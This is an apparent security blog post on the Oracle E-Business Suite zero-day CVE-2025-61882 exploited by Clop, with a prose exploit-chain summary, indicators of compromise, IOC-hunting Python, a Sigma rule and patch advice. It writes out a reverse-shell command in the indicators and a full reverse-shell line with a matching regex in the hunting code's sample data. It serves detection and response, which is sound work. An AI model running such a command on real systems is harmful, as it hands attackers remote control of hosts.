Saiprashanth Pulisetti

Oct 08, 2025

Oracle E-Business Suite Zero-Day Exploited in Clop Data Theft Attacks: CVE-2025-61882

Oracle has patched a critical zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite after the notorious Clop ransomware group exploited it in widespread data theft attacks. This unauthenticated remote code execution flaw carries a CVSS score of 9.8 and affects Oracle EBS versions 12.2.3 through 12.2.14.

Vulnerability Overview

CVE-2025-61882 resides in the BI Publisher Integration component of Oracle Concurrent Processing within Oracle E-Business Suite. The vulnerability allows unauthenticated attackers to remotely execute arbitrary code via HTTP/HTTPS without any user interaction. This flaw enables complete system compromise, including access to sensitive financial, HR, and customer data stored in these critical enterprise systems.

Timeline and Attribution

Security researchers have confirmed that Clop began exploiting this zero-day as early as August 9, 2025, approximately eight weeks before Oracle disclosed and patched the vulnerability. The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-61882 to its Known Exploited Vulnerabilities catalog on October 6, 2025, noting its use in ransomware campaigns.

Charles Carmakal, CTO of Mandiant at Google Cloud, confirmed that “Clop has been exploiting multiple vulnerabilities in Oracle EBS since at least August 2025, stealing large amounts of data from several victims”. The group has been sending extortion emails to executives demanding ransoms in the seven to eight-figure range.

Technical Exploit Chain

Security researchers at watchTowr Labs reverse-engineered the exploit and discovered it involves a sophisticated five-stage attack chain:

  1. Server-Side Request Forgery (SSRF): Attackers send crafted XML POST requests to /OA_HTML/configurator/UiServlet to force the backend server to make arbitrary HTTP requests

  2. CRLF Injection: Malicious headers are injected into SSRF-triggered requests

  3. Request Smuggling: HTTP persistent connections are exploited to chain multiple requests while reducing detection noise

  4. Authentication Bypass: Administrative accounts are compromised through password reset vulnerabilities

  5. Code Execution: Malicious XSLT templates are uploaded via XML Publisher Template Manager endpoints (/OA_HTML/RF.jsp and /OA_HTML/OA.jsp) to achieve remote code execution

Indicators of Compromise

Oracle’s security advisory provides specific IOCs from observed exploitation:

Malicious IP Addresses:

  • 200.107.207[.]26

  • 185.181.60[.]11

Suspicious Commands:

  • sh -c /bin/bash -i >& /dev/tcp/ (reverse shell establishment)

File Hashes (SHA-256):

  • 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d (exploit package)

  • aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 (exp.py exploit script)

  • 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b (server.py support script)
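The indicators above are most useful once they are matched mechanically against telemetry rather than eyeballed. The following Python is an added example written for this post (it is not Oracle's or the author's code): it refangs the defanged IP addresses, hashes files against the listed SHA-256 values, and matches the reverse-shell command pattern. The connection records, process command lines, file contents and the function names (hunt_connections, hunt_processes, hunt_files, run_hunt) are all constructed for the example; only the indicator values come from the advisory as quoted above.

```python
"""Hunt for the CVE-2025-61882 indicators listed in Oracle's advisory.

Added example: the indicator values are the ones quoted in the article; the
sample telemetry below is constructed for demonstration and is not real data.
"""
import hashlib
import re
from dataclasses import dataclass

# Advisory IPs appear defanged ("[.]") in the article; refang them for matching.
MALICIOUS_IPS = {ip.replace("[.]", ".") for ip in ("200.107.207[.]26", "185.181.60[.]11")}

# SHA-256 values from the advisory, mapped to the label the article gives each file.
MALICIOUS_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d": "exploit package",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121": "exp.py exploit script",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b": "server.py support script",
}

# Advisory command "sh -c /bin/bash -i >& /dev/tcp/": tolerate variable whitespace
# between the tokens, since process telemetry often normalises or collapses it.
REVERSE_SHELL_RE = re.compile(r"/bin/bash\s+-i\s+>&\s*/dev/tcp/")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


@dataclass(frozen=True)
class Hit:
    kind: str       # "ip", "command" or "hash"
    record: str     # the telemetry record (or file path) that matched
    indicator: str  # the matched indicator value or its label


def hunt_connections(lines):
    """Flag connection records that mention an advisory IP as source or destination."""
    hits = []
    for line in lines:
        for ip in IPV4_RE.findall(line):
            if ip in MALICIOUS_IPS:
                hits.append(Hit("ip", line, ip))
    return hits


def hunt_processes(cmdlines):
    """Flag process command lines that contain the advisory reverse-shell pattern."""
    return [Hit("command", cmd, "reverse shell") for cmd in cmdlines if REVERSE_SHELL_RE.search(cmd)]


def hunt_files(files):
    """files: mapping path -> bytes. Hash each file and compare with the advisory hashes."""
    hits = []
    for path, data in files.items():
        digest = hashlib.sha256(data).hexdigest()
        if digest in MALICIOUS_SHA256:
            hits.append(Hit("hash", path, MALICIOUS_SHA256[digest]))
    return hits


def run_hunt():
    """Run all three hunts over constructed sample telemetry and return the hits."""
    connections = [  # constructed firewall-style records (hypothetical)
        "2025-10-07T10:15:01Z 10.0.0.5 -> 10.0.0.20:8000 allow",
        "2025-10-07T10:15:03Z 200.107.207.26 -> 10.0.0.20:8000 allow",
        "2025-10-07T10:16:10Z 10.0.0.20 -> 185.181.60.11:443 allow",
    ]
    processes = [  # constructed process command lines (hypothetical)
        "java -Doracle.apps.fnd -cp /u01/app/lib oracle.apps.fnd.cp.gsm.GSMServiceController",
        "sh -c /bin/bash -i >& /dev/tcp/203.0.113.7/4444 0>&1",
        "/bin/sh -c ls -la /u01/app",
    ]
    files = {  # constructed file content; its hash will not match any advisory hash
        "/tmp/exp.py": b"print('constructed benign sample, not the real script')\n",
    }
    return hunt_connections(connections) + hunt_processes(processes) + hunt_files(files)


if __name__ == "__main__":
    for hit in run_hunt():
        print(f"[{hit.kind}] {hit.indicator}: {hit.record}")
```

Two design points worth noting: the IP match is done on extracted IPv4 tokens rather than substrings, so 185.181.60.11:443 is caught while an unrelated address that merely contains the digits is not; and the command match is a regex rather than an exact string, because the advisory only gives the command prefix and real process telemetry will carry the target host and port after /dev/tcp/.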

Sigma Detection Rule

Based on the technical analysis and attack patterns, here is a comprehensive Sigma rule for detecting CVE-2025-61882 exploitation attempts:

title: Oracle EBS CVE-2025-61882 Exploitation Attempt
id: 7b31b049-c803-4a93-a0b1-d4a2c9aafb09
status: experimental
description: |
  Detects potential exploitation attempts targeting Oracle E-Business Suite CVE-2025-61882 vulnerability in BI Publisher Integration.
references:
  - https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
  - https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/
  - https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/
author: Saiprashanth Pulisetti (@0xPrashanthSec)
date: 2025-10-08
tags:
  - attack.initial-access
  - attack.execution
  - attack.t1190
  - attack.t1203
  - cve.2025-61882
  - detection.emerging-threats
logsource:
  category: webserver
detection:
  selection:
    cs-method: POST
    cs-uri-stem: /OA_HTML/SyncServlet
  condition: selection
falsepositives:
  - Legitimate BI Publisher report generation
level: medium
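To make concrete what the rule actually matches, here is an added Python example (it is not part of the original post and not a Sigma backend): it parses W3C extended log lines, the format whose cs-method and cs-uri-stem field names the rule uses, and applies the selection the way the Sigma specification defines it, as a case-insensitive exact string comparison. The log sample, its field layout, the documentation addresses in it and the function names (parse_w3c, matches_selection, detect, detect_sample) are constructed for the example.

```python
"""Apply the Sigma rule above (POST to /OA_HTML/SyncServlet) to W3C extended log lines.

Added example: not a Sigma backend and not the author's code; the log sample is
constructed and uses documentation addresses.
"""

# The rule's field names (cs-method, cs-uri-stem) are W3C extended log format
# field names, which is what Sigma's "webserver" category expects.
RULE_SELECTION = {"cs-method": "POST", "cs-uri-stem": "/OA_HTML/SyncServlet"}

# Constructed sample log (hypothetical traffic, not a real EBS log).
SAMPLE_LOG = """\
#Software: constructed sample, not a real EBS log
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2025-10-07 09:58:12 10.20.0.15 GET /OA_HTML/OA.jsp page=/oracle/apps/fnd/framework/navigate/webui/HomePG 200
2025-10-07 09:58:40 198.51.100.23 POST /OA_HTML/SyncServlet - 200
2025-10-07 09:59:01 10.20.0.15 POST /OA_HTML/RF.jsp function_id=1234 302
2025-10-07 09:59:05 198.51.100.23 GET /OA_HTML/SyncServlet - 200
2025-10-07 09:59:30 198.51.100.23 post /oa_html/syncservlet - 200
"""


def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the most recent #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue  # other directives (#Software, #Date, ...) carry no entries
        if fields is None:
            raise ValueError("log entry appears before any #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            yield {"_malformed": line}  # surface rather than silently drop bad lines
            continue
        yield dict(zip(fields, values))


def matches_selection(entry, selection):
    """Sigma compares strings case-insensitively by default, so do the same here."""
    return all(entry.get(name, "").lower() == value.lower() for name, value in selection.items())


def detect(text, selection=RULE_SELECTION):
    """Return the entries in a W3C log text that satisfy the rule's selection."""
    return [e for e in parse_w3c(text) if "_malformed" not in e and matches_selection(e, selection)]


def detect_sample():
    """Run the rule over the constructed sample log."""
    return detect(SAMPLE_LOG)


if __name__ == "__main__":
    for entry in detect_sample():
        print(f"{entry['date']} {entry['time']} {entry['c-ip']} "
              f"{entry['cs-method']} {entry['cs-uri-stem']}")
```

Running it flags two of the five sample entries: the plain POST to /OA_HTML/SyncServlet and the lower-cased `post /oa_html/syncservlet` line. The second one is the point of the case-insensitive comparison; a hand-written grep for the exact path would miss it. The GET to the same servlet and the POST to /OA_HTML/RF.jsp are left alone because the rule only selects on that one method and path combination, which is also why its falsepositives entry matters: legitimate BI Publisher traffic to that servlet produces the same hit and has to be triaged by source address and timing rather than treated as confirmed exploitation.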

Impact and Business Risk

The exploitation of CVE-2025-61882 represents one of the most significant enterprise security threats of 2025. Oracle E-Business Suite serves as the backbone ERP system for thousands of major enterprises and government organizations worldwide, managing critical functions including:

  • Financial management and accounting

  • Human resources and payroll

  • Supply chain and procurement

  • Customer relationship management

A successful compromise can lead to complete operational shutdown, massive data theft, regulatory violations, and multi-million dollar ransom demands.

Immediate Actions Required

  1. Emergency Patching: Apply Oracle’s security update immediately for all EBS versions 12.2.3–12.2.14

  2. IOC Hunting: Search for the provided indicators of compromise in network logs and system processes

  3. Network Isolation: Remove Oracle EBS systems from internet exposure where possible

  4. Threat Hunting: Deploy the provided Sigma rule and monitor for suspicious activity patterns

Long-term Security Improvements

Organizations should implement comprehensive monitoring for Oracle EBS environments, establish automated vulnerability management processes, and develop incident response procedures specific to ERP system compromises.

The rapid response from the security community, including Oracle, CISA, and threat intelligence firms, demonstrates the critical importance of coordinated vulnerability disclosure in protecting enterprise infrastructure from sophisticated adversaries like Clop.

References:

https://www.oracle.com/security-alerts/alert-cve-2025-61882.html

https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/
